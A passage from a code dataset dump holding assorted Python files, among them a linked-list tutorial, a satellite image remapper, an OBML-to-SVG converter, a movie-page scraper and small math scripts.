opt):\n self.opt = opt\n self.root = opt.dataroot\n self.dir_A = os.path.join(opt.dataroot, opt.phase + 'A')\n self.dir_B = os.path.join(opt.dataroot, opt.phase + 'B')\n\n self.A_paths = make_dataset(self.dir_A)\n self.B_paths = make_dataset(self.dir_B)\n\n self.A_paths = sorted(self.A_paths)\n self.B_paths = sorted(self.B_paths)\n self.A_size = len(self.A_paths)\n self.B_size = len(self.B_paths)\n self.transform_gray = get_transform(opt)\n # opt.grayscale = False\n # self.transform = get_transform(opt)\n\n def __getitem__(self, index):\n A_path = self.A_paths[index % self.A_size]\n index_A = index % self.A_size\n index_B = random.randint(0, self.B_size - 1)\n B_path = self.B_paths[index_B]\n # print('(A, B) = (%d, %d)' % (index_A, index_B))\n\n A_img_raw = Image.open(A_path).convert('RGB')\n B_img_raw = Image.open(B_path).convert('RGB')\n # A_img = to_Lab(io.imread(A_path)) # for Lab color space\n # B_img = to_Lab(io.imread(B_path))\n\n A_img = self.transform_gray(A_img_raw)\n # A_aux = self.transform(A_img_raw)\n # B_img = self.transform(B_img_raw)\n B_img = self.transform_gray(B_img_raw)\n A_aux = A_img[0:3]\n B_aux = B_img[3:6]\n A_img = A_img[3:6]\n B_img = B_img[0:3]\n # print(A_img.size())\n # print(B_img.size())\n\n return {'A': A_img, 'B': B_img, 'A_aux': A_aux, 'B_aux': B_aux,\n 'A_paths': A_path, 'B_paths': B_path}\n\n def __len__(self):\n return max(self.A_size, self.B_size)\n\n def name(self):\n return 'UnalignedDataset'\n","sub_path":"data/unaligned_dataset.py","file_name":"unaligned_dataset.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"320612026","text":"#! /usr/bin/env python3\n# -*- coding: utf-8; mode: python -*-\n\"\"\" Small Python 3.4 script to check the von Neumann method for generating a fair coin from a biasied one.\n\n- Reference: https://en.wikipedia.org/wiki/Fair_coin#Fair_results_from_a_biased_coin\n\n\n- *Date:* Tuesday 22 March 2016.\n- *Author:* Lilian Besson, for the MVA Master, (C) 2015-16.\n- *Licence:* MIT Licence (http://lbesson.mit-license.org).\n\"\"\"\n\nfrom __future__ import print_function, division # Python 2 compatibility if needed\nimport numpy as np\n\n\ndef coin(p=0.5):\n \"\"\" 1 with probability = p, 0 with probability 1 - p. \"\"\"\n return 1 * (np.random.random() < p)\n\n\ndef vonNeumann(q=0.5):\n \"\"\" Use von Neumann's rejection algorithm with an unknown coin (Bernoulli q). \"\"\"\n x, y = coin(q), coin(q)\n while x == y: # (x, y) not in {(1, 0), (1, 0)}\n x, y = coin(q), coin(q)\n return x\n\n\ndef main(n=1000):\n \"\"\" Check that the von Neumann method is indeed simulating a fair coin. \"\"\"\n print(\n \"\\n\\n- Using n = {} tests of the von Neumann method, with unknown q in (0, 1).\".format(\n n\n )\n )\n q = 1.0 / np.pi # Unknown float number 0.3183098861837907\n tests = [vonNeumann(q) for _ in range(n)]\n assert all(\n i in {0, 1} for i in tests\n ), \"Error of the vonNeumann function: a value outside of {0, 1} has been produced...\"\n mu, sigma = np.mean(tests), np.var(tests)\n print(\n \"For the values x generated by the vonNeumann(q) function:\\n Average mu = {:.4g} (should be 0.5) and variance sigma = {:.4g} (should be 0.25).\".format(\n mu, sigma\n )\n )\n delta_mu = abs(mu - 0.5) / 0.5\n delta_sigma = abs(sigma - 0.25) / 0.25\n print(\n \"Relative errors: delta_mu = {:.5%} and delta sigma = {:.5%} (both should be small).\".format(\n delta_mu, delta_sigma\n )\n )\n return mu, sigma\n\n\nif __name__ == \"__main__\":\n for n in (10 ** i for i in range(1, 8)):\n main(n)\n\n# End of fairCoin.py\n","sub_path":"_RESOURCES/my-gists/__CONTAINER/8b2c5f97ac/8b2c5f97ac9b0/fairCoin.py","file_name":"fairCoin.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"326130893","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom utils.format import fmt, pfmt\nfrom utils.isinstance import *\n\nfrom utils.dictionary import head, body, head_body, keys_ending\n\nclass VisitError(Exception):\n def __init__(self, obj):\n msg = fmt('unknown type obj = {obj}')\n super(VisitError, self).__init__(msg)\n\ndef create_cert_name(common_name, timestamp, sep='@'):\n return fmt('{common_name}{sep}{timestamp}')\n\ndef decompose_cert_name(cert_name, sep='@'):\n return cert_name.split(sep)\n\ndef decompose_cert(cert):\n cert_name, cert_body = head_body(cert)\n common_name = cert_body['common_name']\n tardata_body = body(cert_body['tardata'])\n crt_filename = keys_ending(tardata_body, 'crt')[0]\n csr_filename = keys_ending(tardata_body, 'csr')[0]\n key_filename = keys_ending(tardata_body, 'key')[0]\n crt = tardata_body[crt_filename]\n csr = tardata_body[csr_filename]\n key = tardata_body[key_filename]\n return cert_name, common_name, crt, csr, key\n\ndef printit(obj):\n print(obj)\n return obj\n\ndef simple(obj):\n if istuple(obj):\n key, value = obj\n if key[-3:] in ('crt', 'csr', 'key'):\n value = key[-3:].upper()\n return key, value\n return obj\n\ndef abbrev(obj):\n if istuple(obj):\n key, value = obj\n if key[-3:] in ('crt', 'csr', 'key'):\n lines = value.split('\\n')\n lines = lines[:2] + ['...'] + lines[-3:]\n from pprint import pprint\n pprint(dict(lines=lines))\n value = '\\n'.join(lines)\n return key, value\n return obj\n\ndef visit(obj, func=printit):\n obj1 = None\n if isdict(obj):\n obj1 = {}\n for key, value in obj.items():\n if isscalar(value):\n key1, value1 = visit((key, value), func=func)\n else:\n key1 = key\n value1 = visit(value, func=func)\n obj1[key1] = value1\n elif islist(obj):\n obj1 = []\n for item in obj:\n obj1.append(visit(item, func=func))\n elif isscalar(obj) or istuple(obj) and len(obj) == 2:\n obj1 = func(obj)\n else:\n raise VisitError(obj)\n return obj1\n","sub_path":"api/cert.py","file_name":"cert.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"313197504","text":"\"\"\" \r\nLista encadeada \r\n\"\"\"\r\n\r\n\r\n# Representação da classe nó\r\nclass Node:\r\n def __init__(self, data): # inicializador\r\n self.data = data # data representa os dados\r\n self.next = None # local que armazena o próximo nó\r\n\r\n\r\nclass LinkedList:\r\n def __init__(self): # inicializador vazio\r\n self.head = None # a cabeça da lista encadeada\r\n\r\n def append(self, data): # função para inserir elementos na lista vazia\r\n new_node = Node(data) # nova variável de um nó atual\r\n if self.head == None: # quando a lista esta vazia\r\n self.head = new_node\r\n return # se a lista estiver vazia, iremos adicionar um novo nó\r\n\r\n current_node = self.head\r\n\r\n while current_node.next: # função de percorrer toda estrutura de dados\r\n current_node = (\r\n current_node.next\r\n ) # pegando cada nó atual e passando para o próximo\r\n current_node.next = new_node # no final quando a condição for falsa\r\n return\r\n\r\n def length(self): # função que calcula o comprimento\r\n if self.head is None: # verificar se o head é vazio\r\n return 0\r\n current_node = self.head\r\n total = 0 # Init count\r\n # Loop while end of linked list is not reached\r\n while current_node: # enquanto ele for verdadeiro\r\n total += 1 # incrementa nosso contador\r\n current_node = current_node.next # pula para o proximo nó\r\n return total\r\n\r\n def to_list(self): # converte a lista encadeada de volta para lista normal\r\n node_data = [] # iniciar como um vetor vazio\r\n current_node = self.head # igualar o nó atual com o head\r\n\r\n # estou pegando a lista encadeada e jogando para o array\r\n while current_node:\r\n node_data.append(current_node.data) # salvar o valor do dado atual\r\n current_node = current_node.next\r\n return node_data\r\n\r\n # retorna o valor do nó em um index\r\n def get(self, index):\r\n if index >= self.length() or index < 0:\r\n print(\"ERROR: 'Get' Index out of range!\")\r\n return None\r\n current_idx = 0\r\n current_node = self.head\r\n while current_node != None:\r\n if current_idx == index:\r\n return current_node.data\r\n current_node = current_node.next\r\n current_idx += 1\r\n\r\n # reverse a linked list\r\n def reverse_linkedlist(self): # inverter as setas da estrutura\r\n previous_node = None # setar como vazio\r\n current_node = self.head # nó atual\r\n\r\n # enquanto percorre a lista ele inverte os passos do nó\r\n while current_node != None:\r\n next = current_node.next # próximo nó atual\r\n current_node.next = previous_node # nó atual e atribuir ao nó anterior\r\n previous_node = current_node # pegar anterior e colocar nó atual\r\n current_node = next # pegar o nó atual e igualar ao next\r\n self.head = previous_node # head sendo o nó anterior\r\n\r\n # precurar um elemento semelhante ou percorrer uma lista vinculada\r\n def search_item(self, value):\r\n if self.head == None:\r\n print(\"List has no elements\")\r\n return\r\n current_node = self.head\r\n while current_node != None:\r\n if current_node.data == value:\r\n print(\"Item found\")\r\n return True\r\n current_node = current_node.next\r\n print(\"Item not found\")\r\n return False\r\n\r\n def display(self): # mostra os elementos da lista encadeada\r\n contents = self.head\r\n # If the list is null\r\n if contents is None: # se o conteúdo for nulo a lista não tem elemento\r\n print(\"List has no element\")\r\n while contents: # percorrer a lista e printar abaixo\r\n print(contents.data)\r\n contents = contents.next\r\n print(\"----------\") # print para separar\r\n\r\n # excluir um elemento ou um item no início\r\n def remove_at_start(self):\r\n if self.head == None:\r\n print(\"The list has no element to delete\")\r\n return\r\n self.head = self.head.next\r\n\r\n # excluir um elemento ou item no final\r\n def remove_at_end(self):\r\n if self.head is None:\r\n print(\"The list has no element to delete\")\r\n return\r\n current_node = self.head\r\n while current_node.next.next != None:\r\n current_node = current_node.next\r\n current_node.next = None\r\n\r\n # Remover um nó com valor específico\r\n def remove_element_by_value(self, value):\r\n # Store head node\r\n current_node = self.head\r\n\r\n # If head node itself holds the value to be deleted\r\n if current_node != None:\r\n if current_node.data == value:\r\n self.head = current_node.next\r\n current_node = None\r\n return\r\n\r\n # Search for the value to be deleted, keep track of the\r\n # previous node as we need to change 'prev.next'\r\n while current_node != None:\r\n if current_node.data == value:\r\n break\r\n prev = current_node\r\n current_node = current_node.next\r\n\r\n # if value was not present in linked list\r\n if current_node == None:\r\n return\r\n\r\n # Unlink the node from linked list\r\n prev.next = current_node.next\r\n current_node = None\r\n\r\n # Insert an item in a single linked list\r\n # add an item at the start of the list\r\n def insert_at_start(self, data):\r\n new_node = Node(data)\r\n new_node.next = self.head\r\n self.head = new_node\r\n\r\n # Insert an item in a single linked list\r\n # add an item at the end of the list\r\n def insert_at_end(self, data):\r\n new_node = Node(data)\r\n if self.head is None:\r\n self.head = new_node\r\n return\r\n current_node = self.head\r\n while current_node.next is not None:\r\n current_node = current_node.next\r\n current_node.next = new_node\r\n\r\n # Insert an item in a single linked list\r\n # add an item at any index of the list\r\n def insert_at_index(self, index, data):\r\n if index == 1:\r\n new_node = Node(data)\r\n new_node.next = self.head\r\n self.head = new_node\r\n i = 1\r\n current_node = self.head\r\n while i < index - 1 and current_node is not None:\r\n current_node = current_node.next\r\n i = i + 1\r\n if current_node is None:\r\n print(\"ERROR: Index out of range!\")\r\n else:\r\n new_node = Node(data)\r\n new_node.next = current_node.next\r\n current_node.next = new_node\r\n\r\n\r\n# Test\r\nlistaEncadeada = LinkedList()\r\nlistaEncadeada.display()\r\n# Add the elements\r\nlistaEncadeada.append(9)\r\nlistaEncadeada.append(3)\r\nlistaEncadeada.append(8)\r\nlistaEncadeada.append(2)\r\n\r\nlistaEncadeada.display()\r\n\r\nprint(\"The total number of elements are: \" + str(listaEncadeada.length()))\r\nprint(listaEncadeada.to_list()) # Python list\r\nprint(\"---------\")\r\nlistaEncadeada.reverse_linkedlist() # Reverse linked list\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.search_item(9)\r\nlistaEncadeada.search_item(99)\r\n\r\nlistaEncadeada.remove_at_start()\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.remove_at_end()\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.insert_at_start(1)\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.insert_at_end(3)\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.remove_element_by_value(3)\r\nlistaEncadeada.display()\r\n\r\nlistaEncadeada.insert_at_index(2, 88)\r\nlistaEncadeada.display()\r\n","sub_path":"08_Class/exemplo05.py","file_name":"exemplo05.py","file_ext":"py","file_size_in_byte":7722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"27578880","text":"from __future__ import print_function\n\n\ndef read_spectrum(filename,\n return_type=int):\n \"\"\"\n Reads a .spe file into a numpy array.\n\n Parameters:\n -----------\n filename : string\n Filename with .spe extension\n return_type : int or float\n Type of number to return\n Returns:\n --------\n spectrum : vector\n The source spectrum\n\n \"\"\"\n\n try:\n with open(filename, 'r') as myFile:\n filecontent = myFile.readlines()\n for index, line in enumerate(filecontent):\n if '$DATA:' in line:\n break\n spec_len_index = index + 1\n spec_index = index + 2\n spec_len = filecontent[spec_len_index]\n except UnicodeDecodeError:\n with open(filename, 'rb') as myFile:\n filecontent = myFile.readlines()\n for index, line in enumerate(filecontent):\n if b'$DATA:' in line:\n break\n spec_len_index = index + 1\n spec_index = index + 2\n spec_len = filecontent[spec_len_index].decode()[:-2]\n else:\n print('spe in unknown encoding')\n\n spec_len = int(spec_len.split(' ')[1]) + 1\n spectrum = [return_type(x) for x in filecontent[spec_index:\n spec_index + spec_len]]\n return spectrum\n","sub_path":"annsa/annsa.py","file_name":"annsa.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"245366416","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/7/18 9:03\n# @Author : Valette\n# @Email : foxmail\n# @File : KNN_find_price.py\n# @Software: PyCharm\nimport numpy as np\nfrom math import sqrt\nfrom position_makeup import get_geo_pos\nfrom mysql_connection import cur\n\n\ndef find_price(location, region=\"黄岛\"):\n user_pos_data = get_geo_pos(location, region)\n if user_pos_data.__len__() > 0 and 'location' in user_pos_data[0].keys():\n user_pos = [user_pos_data[0]['location']['lng'], user_pos_data[0]['location']['lat']]\n\n cur.execute('SELECT `坐标`, `���考单价` FROM `楼盘` WHERE `坐标` IS NOT NULL AND `参考单价` IS NOT NULL')\n datas = cur.fetchall()\n x_pos = []\n y_price = []\n for data in datas:\n t_pos = data[0].split(\",\")\n x_pos.append([float(i) for i in t_pos])\n y_price.append(data[1])\n\n x_train = np.array(x_pos)\n y_train = np.array(y_price)\n x = np.array(user_pos)\n # KNN的过程\n # 计算每一个点距离小x 之间的距离 ,然后进行正序排序 选取 前k个 对前k个样本的投票结果进行统计\n distances = [sqrt(np.sum((x_t-x)**2)) for x_t in x_train]\n nearest = np.argsort(distances)\n # 我们指定k 的值为5\n k = 5\n topK_y = [y_train[i] for i in nearest[:k]]\n print(topK_y)\n\n # 统计结果\n average = np.mean(topK_y)\n print(\"{}周边房价预计:{}元/平方米\".format(location, average))\n return average\n else:\n print(\"查不到您的位置:{}-{}\".format(location, region))\n return None\n\n\nif __name__ == '__main__':\n find_price(\"山东科技大学\")\n","sub_path":"KNN_find_price.py","file_name":"KNN_find_price.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"399815569","text":"from lxml import etree\r\nimport requests\r\n\r\ndef get_url(url):\r\n\tresp = requests.get(url)\r\n\tfp = open('douban.html','w',encoding = 'utf-8')\r\n\tfp.write(resp.content.decode('utf-8'))\r\n\thtml = 'douban.html'\r\n\treturn html\r\n\r\n\r\ndef get_info(html):\r\n\tparser = etree.HTMLParser(encoding = 'utf-8')\r\n\thtml = etree.parse(html,parser = parser)\r\n\tmovies = html.xpath(\".//ol[@class='grid_view']/li\")\r\n\tmovies_info = []\r\n\tfor movie in movies:\r\n\t\tname = movie.xpath(\".//span[@class = 'title']/text()\")[0]\r\n\t\tlink = movie.xpath(\".//div[@class= 'pic']/a/@href\")[0]\r\n\t\tmovie_info = movie.xpath(\".//p[@class='']/text()\")[0]\r\n\t\tstar = movie.xpath(\".//div[@class='star']/span[@class='rating_num']/text()\")[0]\r\n\t\taudience = movie.xpath(\".//div[@class='star']/span[4]/text()\")[0]\r\n\t\tquote = movie.xpath(\".//span[@class = 'inq']/text()\")[0]\r\n\r\n\t\tmovie_info = {\r\n\t\t'name':name,\r\n\t\t'link':link,\r\n\t\t'movie_info':movie_info,\r\n\t\t'star':star,\r\n\t\t'audience':audience,\r\n\t\t'quote':quote\r\n\t\t}\r\n\t\tmovies_info.append(movie_info)\r\n\r\n\tfor movie_info in movies_info:\r\n\t\tprint(movie_info)\r\n\t\tprint('\\n')\r\n\r\n\r\ndef spider():\r\n\tbase_url = 'https://movie.douban.com/top250?start={}&filter='\r\n\tdetail_urls = []\r\n\tfor x in range(0,100,25):\r\n\t\tdetail_url = base_url.format(x)\r\n\t\tdetail_urls.append(detail_url)\r\n\tfor detail_url in detail_urls:\r\n\t\thtml = get_url(detail_url)\r\n\t\tget_info(html)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tspider()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"web-crawling-projects/douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"179740132","text":"def get_row(rowIndex):\n # Method 1\n # ans = [0] * (rowIndex + 1)\n # ans[0] = 1\n # for i in range(1, rowIndex + 1):\n # for j in range(i, 0, -1):\n # ans[j] += ans[j-1]\n #\n # return ans\n\n # Method 2\n row = [1]\n for _ in range(rowIndex):\n row = [x + y for x,y in zip([0] + row, row + [0])]\n\n return row\n\n\n\n\nprint(get_row(5))\n","sub_path":"pascal_triangle_II.py","file_name":"pascal_triangle_II.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"413006798","text":"import time as t\r\n\r\nimport numpy as np\r\nfrom netCDF4 import Dataset\r\nfrom osgeo import gdal\r\nfrom osgeo import osr\r\n\r\n# Define KM_PER_DEGREE\r\nKM_PER_DEGREE = 111.32\r\n\r\n# GOES-16 Extent (satellite projection) [llx, lly, urx, ury]\r\n\r\n# GOES16_EXTENT = [-5434894.885056, -5434894.885056, 5434894.885056, 5434894.885056]\r\n\r\n# GOES-16 Spatial Reference System\r\nsourcePrj = osr.SpatialReference()\r\nsourcePrj.ImportFromProj4('+proj=geos +h=35786023.0 +a=6378137.0 +b=6356752.31414 +f=0.00335281068119356027 '\r\n '+lat_0=0.0 +lon_0=-75.0 +sweep=x +no_defs')\r\n\r\n# Lat/lon WSG84 Spatial Reference System\r\ntargetPrj = osr.SpatialReference()\r\ntargetPrj.ImportFromProj4('+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs')\r\n\r\n\r\ndef export_image(image, path):\r\n driver = gdal.GetDriverByName('netCDF')\r\n return driver.CreateCopy(path, image, 0)\r\n\r\n\r\ndef get_geo_t(extent, nlines, ncols):\r\n # Compute resolution based on data dimension\r\n resx = (extent[2] - extent[0]) / ncols\r\n resy = (extent[3] - extent[1]) / nlines\r\n return [extent[0], resx, 0, extent[3], 0, -resy]\r\n\r\n\r\ndef get_scale_offset(path, var):\r\n nc = Dataset(path)\r\n scale = nc.variables[var].scale_factor\r\n offset = nc.variables[var].add_offset\r\n nc.close()\r\n return scale, offset\r\n\r\n\r\ndef get_extent(path, var):\r\n nc = Dataset(path)\r\n h = nc.variables['goes_imager_projection'].perspective_point_height\r\n x1 = nc.variables['x_image_bounds'][0] * h\r\n x2 = nc.variables['x_image_bounds'][1] * h\r\n y1 = nc.variables['y_image_bounds'][1] * h\r\n y2 = nc.variables['y_image_bounds'][0] * h\r\n goes_extent = [x1, y1, x2, y2]\r\n nc.close()\r\n return goes_extent\r\n\r\n\r\ndef remap(path, extent, resolution, driver, var):\r\n # Read scale/offset from file\r\n\r\n # scale, offset = getScaleOffset(path,var)\r\n goes_extent = get_extent(path, var)\r\n # Build connection info based on given driver name\r\n if driver == 'NETCDF':\r\n connection_info = 'NETCDF:\\\"' + path + '\\\":' + var\r\n else: # HDF5\r\n connection_info = 'HDF5:\\\"' + path + '\\\"://' + var\r\n # Open NetCDF file (GOES-16 data) \r\n raw = gdal.Open(connection_info, gdal.GA_ReadOnly)\r\n # Setup projection and geo-transformation\r\n raw.SetProjection(sourcePrj.ExportToWkt())\r\n raw.SetGeoTransform(get_geo_t(goes_extent, raw.RasterYSize, raw.RasterXSize))\r\n # Compute grid dimension\r\n if resolution is not None:\r\n sizex = int(((extent[2] - extent[0]) * KM_PER_DEGREE) / resolution) - 1\r\n sizey = int(((extent[3] - extent[1]) * KM_PER_DEGREE) / resolution) - 1\r\n # print(sizex, sizey)\r\n else:\r\n sizex = raw.RasterXSize\r\n sizey = raw.RasterYSize\r\n # Get memory driver\r\n mem_driver = gdal.GetDriverByName('MEM')\r\n # Create grid\r\n grid = mem_driver.Create('grid', sizex, sizey, 1, gdal.GDT_Float32)\r\n # Setup projection and geo-transformation\r\n grid.SetProjection(targetPrj.ExportToWkt())\r\n grid.SetGeoTransform(get_geo_t(extent, grid.RasterYSize, grid.RasterXSize))\r\n # Perform the projection/resampling\r\n # print('Remapping', path)\r\n start = t.time()\r\n gdal.ReprojectImage(raw, grid, sourcePrj.ExportToWkt(), targetPrj.ExportToWkt(), gdal.GRA_NearestNeighbour,\r\n options=['NUM_THREADS=ALL_CPUS'])\r\n # print('- finished! Time:', t.time() - start, 'seconds')\r\n # Read grid data\r\n array = grid.ReadAsArray()\r\n # Mask fill values (i.e. invalid values)\r\n np.ma.masked_where(array, array == -1, False)\r\n return grid, array\r\n","sub_path":"src/plotters_lib/remap.py","file_name":"remap.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"261932993","text":"#!/usr/bin/env python3\n#coding:utf8\n\nfrom sys import argv, stderr\nfrom base64 import b64encode\nfrom os import system as polecenie\n\n# ustawienia\nsvgz='nie' # nie, większe, mniejsze, tak\n\n# informacje o przebiegu pracy\nmrucz=[\n 'złe',\n #'dobre',\n #'dobre krótko',\n 'dobre b. krótko',\n #'I',\n #'F',\n #'F²',\n #'pierwszy S',\n #'nieznane',\n #'pięciobajt',\n 'plik',\n #'objętość',\n #'porcja',\n 'tytuł',\n #'Mu',\n #'MC',\n #'T',\n #'obrazki',\n #'certyfikat',\n #'frędzle',\n #'pióroN'\n]\n# „stałe”\nrodzajePól={\n 83 : ['input','color'],\n 97 : ['textarea',False],\n 99 : ['input','checkbox'],\n 112 : ['input','password'],\n 114 : ['input','radio'],\n 115 : ['select',False],\n 120 : ['input','text']\n}\npoprawkiPól={'input':[2,6,6],'select':[0,18,0],'textarea':[0,0,0]}\nlistaKolorów={'#c0c0c0':'silver','#808080':'gray','#800000':'maroon','#ff0000':'red','#800080':'purple','#008000':'green','#808000':'olive','#000080':'navy','#008080':'teal','#f0ffff':'azure','#f5f5dc':'beige','#ffe4c4':'bisque','#a52a2a':'brown','#ff7f50':'coral','#ffd700':'gold','#4b0082':'indigo','#fffff0':'ivory','#f0e68c':'khaki','#faf0e6':'linen','#da70d6':'orchid','#cd853f':'peru','#ffc0cb':'pink','#dda0dd':'plum','#fa8072':'salmon','#a0522d':'sienna','#fffafa':'snow','#d2b48c':'tan','#ff6347':'tomato','#ee82ee':'violet','#f5deb3':'wheat'}\nCSS='\\ttext {font-size:12px;font-family:sans-serif}\\n\\ta > rect {fill:#0000f0;fill-opacity:0.1;stroke:#0000f0;stroke-width:2}\\n\\ta {opacity:0}\\n\\ta:hover {opacity:1}\\n\\n\\tbody {margin:0px}\\n\\tinput, select {position:absolute;box-sizing:border-box;background:none;border:none;margin:0}\\n\\tdiv[id] {position:absolute;width:1px;height:1px}\\n'\n\n# funkcje\ndef naLinijki(tekst,x,y,rozmiar):\n wynik=''\n y+=rozmiar\n tekst=tekst.replace('&','&').replace('<','<').replace('>','>')\n if tekst.count('\\n'):\n tekst=tekst.split('\\n')\n odgóry=y\n wynik+='>'\n for linia in tekst:\n wynik+='%s' %(x,odgóry,linia)\n odgóry=round(1.33*rozmiar+odgóry,3)\n else:\n wynik+=' x=\"%s\" y=\"%s\">%s' %(x,y,tekst)\n return wynik\n\ndef zsumuj(*liczby):\n wynik=0\n dł=len(liczby)\n if dł==1:\n liczby=liczby[0]\n dł=len(liczby)\n for i in range(dł):\n wynik+=liczby[i]*256**(dł-i-1)\n return wynik\n\ndef dajZnać(oCzym):\n print (oCzym,file=stderr)\n\ndef lidżbajty(a):\n wynik=''\n for i in a:\n wynik+='%3s ' %i\n return (wynik)\n\ndef barwa(r,g,b):\n rgb='#%02x%02x%02x' %(r,g,b)\n if rgb in listaKolorów:\n return listaKolorów[rgb]\n if rgb[1:6:2]==rgb[2:7:2]:\n rgb=rgb[0:7:2]\n return rgb\n\ndef przetwórz(dane, ścieżkaWyjścia):\n WSTĘP='\\n'\n HTML=''\n SVG='3:\n dajZnać('formatowanie %s na %s miejscu — %s' %(daneZ[16],odl,daneZ[20+frędzle:20+frędzle+zsumuj(daneZ[18+frędzle:20+frędzle])].decode()))\n SVG+=' style=\"%s\"' %styl[:-1] if styl else ''\n SVG+=' opacity=\"%s\"' %round(daneZ[11]/255.0,3) if daneZ[11]<255 else ''\n SVG+=' fill=\"%s\"' %barwa(daneZ[12],daneZ[13],daneZ[14]) if (daneZ[12],daneZ[13],daneZ[14])!=(0,0,0) else ''\n pióroBok=(pióroBok+zsumuj(daneZ[1:3]))%NW_SZER\n pióroDół=(pióroDół+zsumuj(daneZ[3:6]))%NW_SZER\n SVG+=naLinijki(daneZ[20+frędzle:20+frędzle+zsumuj(daneZ[18+frędzle:20+frędzle])].decode(),pióroBok,pióroDół,rozmiar)+'\\n'\n if mrucz.count('T'):\n dajZnać(lidżbajty(daneZ[6:12]))\n dajZnać(lidżbajty(daneZ[15:18+frędzle]))\n if mrucz.count('frędzle') and frędzle:\n dajZnać('frędzle: %s' %frędzle)\n odl+=19+zsumuj(daneZ[18+frędzle:20+frędzle])+frędzle\n #0-14,18-19\n elif bajt==0x42: #B\n if poprzednioEn:\n pióroBok = 0\n pióroDół = 0\n poprzednioEn = False\n byłoBe=True\n pióroBok=(pióroBok+zsumuj(daneZ[1:3]))%NW_SZER\n pióroDół=(pióroDół+zsumuj(daneZ[3:6]))%NW_SZER\n SVG+=''+chr(daneZ[18])+'<')\n elif bajt==0x53: #S\n if znaczenieS=='jakDługoIPolem':\n zasięgPodmiotów=odl+zsumuj(daneZ[1:4])\n if mrucz.count('pierwszy S'):\n dajZnać(lidżbajty(daneZ[1:4]))\n znaczenieS='plecak, guziki'\n możliwaRozwijka=True\n odl+=3\n elif znaczenieS=='plecak, guziki' and odl=zasięgPodmiotów:\n rozmiarPlecaka=zsumuj(daneZ[1:4])\n stemple=daneZ[4:4+rozmiarPlecaka]\n nr=0\n while nr','\\n' %CSS))\n tymczasowy.close()\n \n polecenie('cat obml_svg.tpm | gzip > obml_svg.2.tpm')\n polecenie('base64 -w 0 obml_svg.2.tpm > obml_svg.tpm')\n \n tymczasowy=open('obml_svg.tpm','r')\n zbasowany=tymczasowy.read()\n tymczasowy.close()\n \n polecenie('rm obml_svg.tpm obml_svg.2.tpm')\n \n zbasowany='' %zbasowany\n \n if svgz=='tak' or ( svgz=='mniejsze' and len(zbasowany)len(SVG) ):\n SVG=zbasowany\n\n wyjście=open(ścieżkaWyjścia,'w')\n print (WSTĘP,file=wyjście)\n print ('' %CSS,file=wyjście)\n print (SVG,file=wyjście)\n print (HTML,file=wyjście)\n wyjście.close()\n\nif len(argv)==1:\n print (\"Nie podano pliku\", file=stderr)\n quit()\n#for nazwaPlikuObml in argv[1:]:\nfor nazwaPlikuObml in argv[1:]: #Ẃelḱe os^ustfo\n if mrucz.count('plik'):\n dajZnać(nazwaPlikuObml)\n \n try:\n plikObml=open(nazwaPlikuObml,'rb')\n except IOError:\n print (\"Nie ma takiego pliku\", file=stderr)\n continue\n \n dane=plikObml.read()\n plikObml.close()\n przetwórz(dane,nazwaPlikuObml[:-6]+'html')","sub_path":"obml7NaSvgIHtml.py","file_name":"obml7NaSvgIHtml.py","file_ext":"py","file_size_in_byte":21240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271500695","text":"\n\nfrom xai.brain.wordbase.verbs._gyrate import _GYRATE\n\n#calss header\nclass _GYRATING(_GYRATE, ):\n\tdef __init__(self,): \n\t\t_GYRATE.__init__(self)\n\t\tself.name = \"GYRATING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"gyrate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_gyrating.py","file_name":"_gyrating.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"13000689","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nclass Movie(db.Model):\n __tablename__ = 'movies'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String)\n star = db.Column(db.Float)\n img = db.Column(db.String)\n \n def __init__(self,title,star,img):\n self.title = title\n self.star = star\n self.img = img","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"575084060","text":"#!/usr/bin/python\r\n\r\nimport os\r\nimport json\r\nimport argparse\r\nimport logging\r\nimport datetime\r\nimport calendar\r\nimport requests\r\nimport glob\r\n\r\nfrom keystoneauth1 import loading\r\nfrom keystoneauth1 import session\r\n\r\nfrom keystoneclient import client as keystone_client\r\nfrom novaclient import client as nova_client\r\n\r\ndef deep_compare(obj):\r\n if 